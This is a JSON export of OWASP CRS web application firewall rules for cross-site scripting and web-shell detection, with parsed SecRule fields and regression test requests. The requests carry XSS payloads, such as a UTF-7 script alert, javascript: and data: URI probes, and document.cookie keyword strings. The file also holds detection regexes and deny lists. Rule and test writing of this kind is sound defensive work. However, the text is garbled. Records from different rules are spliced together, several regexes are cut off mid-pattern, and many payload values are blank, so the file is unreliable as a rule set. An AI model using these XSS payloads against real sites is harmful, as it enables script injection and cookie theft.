"lineno": 467, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 468, "act_quote": "quotes", "act_arg": "attack-rce", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 469, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 470, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 471, "act_quote": "quotes", "act_arg": "OWASP_CRS/WEB-SHELLS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 472, "act_quote": "quotes", "act_arg": "capec/1000/225/122/17/650", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 473, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 474, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 475, "act_quote": "quotes", "act_arg": "tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 458 } }, { "rule_id": "955320", "has_tests": false, "detection": { "variables": [ { "name": "RESPONSE_BODY", "part": "", "negated": false } ], "operator": { "type": "@rx", "argument": ">SmEvK_PaThAn Shell v[0-9]+ coded by SmEvK_PaThAn Shell v[0-9]+ coded by \\n[^~]*~ Shell I\\n\\n" }, "expected": { "should_block": true, "rule_ids": [ 941170 ] }, "malicious_patterns": [ { "location": "post_body", "value": "payload=javascript:/*-->" } ] }, { "description": "Test first backslash match (javascript:(?:[\\s\\S]+[=\\x5c\\(\\[\\.<]) with: javascript: \\\\\\\\t (extra backslashes to work around rule transformations)", "test_id": 3, "request": { "method": "GET", "uri": "/get?var=javascript:%20%5C%5C%5C%5Ct", "headers": { "Accept": "*/*", "User-Agent": "OWASP CRS test agent", "Host": "localhost" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 941170 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "var=javascript:%20%5C%5C%5C%5Ct" } ] }, { "description": "Test second backslash match (javascript:(?:...|\\x5c[ux]\\d)) with: javascript:\\\\\\\\u0020 (extra backslashes to work around rule transformations)", "test_id": 4, "request": { "method": "GET", "uri": "/get?var=javascript:%5C%5C%5C%5Cu0020", "headers": { "Accept": "*/*", "User-Agent": "OWASP CRS test agent", "Host": "localhost" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 941170 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "var=javascript:%5C%5C%5C%5Cu0020" } ] }, { "description": "Status Page Test - data: , as GET variable", "test_id": 5, "request": { "method": "GET", "uri": "/get?test=%20data%3A%20%2C%20%3Cx%3E", "headers": { "Accept": "*/*", "User-Agent": "OWASP CRS test agent", "Host": "localhost" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 941170 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "test=%20data%3A%20%2C%20%3Cx%3E" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 231, "variables": [ { "variable": "REQUEST_COOKIES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_COOKIES_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_HEADERS", "variable_part": "User-Agent", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_HEADERS", "variable_part": "Referer", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_FILENAME", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "XML", "variable_part": "/*", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "(?i)(?:\\W|^)(?:javascript:(?:[\\s\\S]+[=\\x5c\\(\\[\\.<]|[\\s\\S]*?(?:\\bname\\b|\\x5c[ux]\\d))|data:(?:(?:[a-z]\\w+/\\w[\\w+-]+\\w)?[;,]|[\\s\\S]*?;[\\s\\S]*?\\b(?:base64|charset=)|[\\s\\S]*?,[\\s\\S]*?<[\\s\\S]*?\\w[\\s\\S]*?>))|@\\W*?i\\W*?m\\W*?p\\W*?o\\W*?r\\W*?t\\W*?(?:/\\*[\\s\\S]*?)?(?:[\\\"']|\\W*?u\\W*?r\\W*?l[\\s\\S]*?\\()|[^-]*?-\\W*?m\\W*?o\\W*?z\\W*?-\\W*?b\\W*?i\\W*?n\\W*?d\\W*?i\\W*?n\\W*?g[^:]*?:\\W*?u\\W*?r\\W*?l[\\s\\S]*?\\(", "actions": [ { "act_name": "id", "lineno": 232, "act_quote": "no_quote", "act_arg": "941170", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 233, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 234, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 235, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 236, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 236, "act_quote": "no_quote", "act_arg": "utf8toUnicode", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 236, "act_quote": "no_quote", "act_arg": "urlDecodeUni", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 236, "act_quote": "no_quote", "act_arg": "htmlEntityDecode", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 236, "act_quote": "no_quote", "act_arg": "jsDecode", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 236, "act_quote": "no_quote", "act_arg": "cssDecode", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 236, "act_quote": "no_quote", "act_arg": "removeNulls", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 237, "act_quote": "quotes", "act_arg": "NoScript XSS InjectionChecker: Attribute Injection", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 238, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 239, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 240, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 241, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 242, "act_quote": "quotes", "act_arg": "attack-xss", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 243, "act_quote": "quotes", "act_arg": "xss-perf-disable", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 244, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 245, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 246, "act_quote": "quotes", "act_arg": "OWASP_CRS/ATTACK-XSS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 247, "act_quote": "quotes", "act_arg": "capec/1000/152/242", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 248, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 249, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 250, "act_quote": "quotes", "act_arg": "tx.xss_score=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 251, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 231 } }, { "rule_id": "941180", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_COOKIES", "part": "", "negated": false }, { "name": "REQUEST_COOKIES_NAMES", "part": "", "negated": false }, { "name": "ARGS_NAMES", "part": "", "negated": false }, { "name": "ARGS", "part": "", "negated": false }, { "name": "REQUEST_FILENAME", "part": "", "negated": false }, { "name": "XML", "part": "/*", "negated": false } ], "operator": { "type": "@pm", "argument": "document.cookie document.domain document.querySelector document.body.appendChild document.write .parentnode .innerhtml window.location -moz-binding , present in stricter sibling 941181, ARGS", "test_id": 4, "request": { "method": "POST", "uri": "/post/foo", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "941180-4=-->" }, "expected": { "should_block": false, "rule_ids": [ 941180 ] }, "malicious_patterns": [ { "location": "post_body", "value": "941180-4=-->" } ] }, { "description": "XSS with embedded shell execution attempt (batch script)", "test_id": 5, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=\"-->'-->`-->" }, "expected": { "should_block": true, "rule_ids": [ 941180 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=\"-->'-->`-->" } ] }, { "description": "Node-validator deny list keywords, ARGS, issue #2512", "test_id": 6, "request": { "method": "POST", "uri": "/post/bar", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "arg=...(document.domain)..." }, "expected": { "should_block": true, "rule_ids": [ 941180 ] }, "malicious_patterns": [ { "location": "post_body", "value": "arg=...(document.domain)..." } ] }, { "description": "We should not trigger on REQUEST_FILENAME without special characters", "test_id": 7, "request": { "method": "GET", "uri": "/get/javascript-manual/document.cookie", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 941180 ] }, "malicious_patterns": [] }, { "description": "Node-validator deny list keywords", "test_id": 8, "request": { "method": "POST", "uri": "/post/bar", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "foo=document.querySelector(\"p\").textContent=\"XSS\"" }, "expected": { "should_block": true, "rule_ids": [ 941180 ] }, "malicious_patterns": [ { "location": "post_body", "value": "foo=document.querySelector(\"p\").textContent=\"XSS\"" } ] }, { "description": "Node-validator deny list keywords", "test_id": 9, "request": { "method": "POST", "uri": "/post/bar", "headers": { "User-Agent": "OWASP CRS test agent", "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "foo=document.body.appendChild(document.createElement(\"h1\")).textContent = \"XSS\"" }, "expected": { "should_block": true, "rule_ids": [ 941180 ] }, "malicious_patterns": [ { "location": "post_body", "value": "foo=document.body.appendChild(document.createElement(\"h1\")).textContent = \"XSS\"" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 259, "variables": [ { "variable": "REQUEST_COOKIES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_COOKIES_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_FILENAME", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "XML", "variable_part": "/*", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@pm", "operator_argument": "document.cookie document.domain document.querySelector document.body.appendChild document.write .parentnode .innerhtml window.location -moz-binding XSS" }, "expected": { "should_block": true, "rule_ids": [ 941220 ] }, "malicious_patterns": [ { "location": "post_body", "value": "payload=XSS" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 358, "variables": [ { "variable": "REQUEST_COOKIES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_COOKIES_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_FILENAME", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "XML", "variable_part": "/*", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "(?i)(?:v|&#(?:0*(?:118|86)|x0*[57]6);)(?:[\\t\\n\\r]|&(?:#(?:0*(?:9|1[03])|x0*[AD]);?|(?:tab|newline);))*(?:b|&#(?:0*(?:98|66)|x0*[46]2);)(?:[\\t\\n\\r]|&(?:#(?:0*(?:9|1[03])|x0*[AD]);?|(?:tab|newline);))*(?:s|&#(?:0*(?:115|83)|x0*[57]3);)(?:[\\t\\n\\r]|&(?:#(?:0*(?:9|1[03])|x0*[AD]);?|(?:tab|newline);))*(?:c|&#(?:x0*[46]3|0*(?:99|67));)(?:[\\t\\n\\r]|&(?:#(?:0*(?:9|1[03])|x0*[AD]);?|(?:tab|newline);))*(?:r|&#(?:x0*[57]2|0*(?:114|82));)(?:[\\t\\n\\r]|&(?:#(?:0*(?:9|1[03])|x0*[AD]);?|(?:tab|newline);))*(?:i|&#(?:x0*[46]9|0*(?:105|73));)(?:[\\t\\n\\r]|&(?:#(?:0*(?:9|1[03])|x0*[AD]);?|(?:tab|newline);))*(?:p|&#(?:x0*[57]0|0*(?:112|80));)(?:[\\t\\n\\r]|&(?:#(?:0*(?:9|1[03])|x0*[AD]);?|(?:tab|newline);))*(?:t|&#(?:x0*[57]4|0*(?:116|84));)(?:[\\t\\n\\r]|&(?:#(?:0*(?:9|1[03])|x0*[AD]);?|(?:tab|newline);))*(?::|&(?:#(?:0*58|x0*3A);?|colon;)).", "actions": [ { "act_name": "id", "lineno": 359, "act_quote": "no_quote", "act_arg": "941220", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 360, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 361, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 362, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 363, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 363, "act_quote": "no_quote", "act_arg": "utf8toUnicode", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 363, "act_quote": "no_quote", "act_arg": "urlDecodeUni", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 363, "act_quote": "no_quote", "act_arg": "htmlEntityDecode", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 363, "act_quote": "no_quote", "act_arg": "jsDecode", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 363, "act_quote": "no_quote", "act_arg": "cssDecode", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 363, "act_quote": "no_quote", "act_arg": "removeNulls", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 364, "act_quote": "quotes", "act_arg": "IE XSS Filters - Attack Detected", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 365, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 366, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 367, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 368, "act_quote": "quotes", "act_arg": "platform-internet-explorer", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 369, "act_quote": "quotes", "act_arg": "attack-xss", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 370, "act_quote": "quotes", "act_arg": "xss-perf-disable", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 371, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 372, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 373, "act_quote": "quotes", "act_arg": "OWASP_CRS/ATTACK-XSS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 374, "act_quote": "quotes", "act_arg": "capec/1000/152/242", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 375, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 376, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 377, "act_quote": "quotes", "act_arg": "tx.xss_score=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 378, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 358 } }, { "rule_id": "941230", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_COOKIES", "part": "", "negated": false }, { "name": "REQUEST_COOKIES_NAMES", "part": "", "negated": false }, { "name": "ARGS_NAMES", "part": "", "negated": false }, { "name": "ARGS", "part": "", "negated": false }, { "name": "REQUEST_FILENAME", "part": "", "negated": false }, { "name": "XML", "part": "/*", "negated": false } ], "operator": { "type": "@rx", "argument": "(?i)&var2=whatever" }, "expected": { "should_block": true, "rule_ids": [ 941230 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=&var2=whatever" } ] }, { "description": "XSS test based on portswigger XSS cheatsheet", "test_id": 2, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "payload=" }, "expected": { "should_block": true, "rule_ids": [ 941230 ] }, "malicious_patterns": [ { "location": "post_body", "value": "payload=" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 381, "variables": [ { "variable": "REQUEST_COOKIES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_COOKIES_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_FILENAME", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "XML", "variable_part": "/*", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "(?i)" }, "expected": { "should_block": true, "rule_ids": [ 941250 ] }, "malicious_patterns": [ { "location": "post_body", "value": "payload=" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 427, "variables": [ { "variable": "REQUEST_COOKIES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_COOKIES_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_FILENAME", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "XML", "variable_part": "/*", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "(?i:&var2=whatever" }, "expected": { "should_block": true, "rule_ids": [ 941260 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=&var2=whatever" } ] }, { "description": "XSS test based on portswigger XSS cheatsheet", "test_id": 2, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "payload= +ADw-script+AD4-alert(1)+ADw-/script+AD4-" }, "expected": { "should_block": true, "rule_ids": [ 941260 ] }, "malicious_patterns": [ { "location": "post_body", "value": "payload= +ADw-script+AD4-alert(1)+ADw-/script+AD4-" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 450, "variables": [ { "variable": "REQUEST_COOKIES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_COOKIES_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_FILENAME", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "XML", "variable_part": "/*", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "(?i:" }, "expected": { "should_block": true, "rule_ids": [ 941270 ] }, "malicious_patterns": [ { "location": "post_body", "value": "payload=" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 473, "variables": [ { "variable": "REQUEST_COOKIES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_COOKIES_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_FILENAME", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "XML", "variable_part": "/*", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "(?i)xss" }, "expected": { "should_block": true, "rule_ids": [ 941280 ] }, "malicious_patterns": [ { "location": "post_body", "value": "payload=xss" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 496, "variables": [ { "variable": "REQUEST_COOKIES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_COOKIES_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_FILENAME", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "XML", "variable_part": "/*", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "(?i)]", "negated": false } }, "transformations": [ "none", "utf8toUnicode", "urlDecodeUni", "htmlEntityDecode", "jsDecode", "cssDecode", "removeNulls" ], "metadata": { "phase": "2", "message": "IE XSS Filters - Attack Detected", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-xss" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-internet-explorer", "attack-xss", "xss-perf-disable", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/ATTACK-XSS", "capec/1000/152/242" ] }, "test_cases": [ { "description": "IE XSS Filters", "test_id": 1, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=&var=whatever" }, "expected": { "should_block": true, "rule_ids": [ 941290 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=&var=whatever" } ] }, { "description": "XSS test based on portswigger XSS cheatsheet", "test_id": 2, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "payload=" }, "expected": { "should_block": true, "rule_ids": [ 941290 ] }, "malicious_patterns": [ { "location": "post_body", "value": "payload=" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 519, "variables": [ { "variable": "REQUEST_COOKIES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_COOKIES_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_FILENAME", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "XML", "variable_part": "/*", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "(?i)]", "actions": [ { "act_name": "id", "lineno": 520, "act_quote": "no_quote", "act_arg": "941290", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 521, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 522, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 523, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 524, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 524, "act_quote": "no_quote", "act_arg": "utf8toUnicode", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 524, "act_quote": "no_quote", "act_arg": "urlDecodeUni", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 524, "act_quote": "no_quote", "act_arg": "htmlEntityDecode", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 524, "act_quote": "no_quote", "act_arg": "jsDecode", "act_arg_val": "", "act_arg_val_param": "", 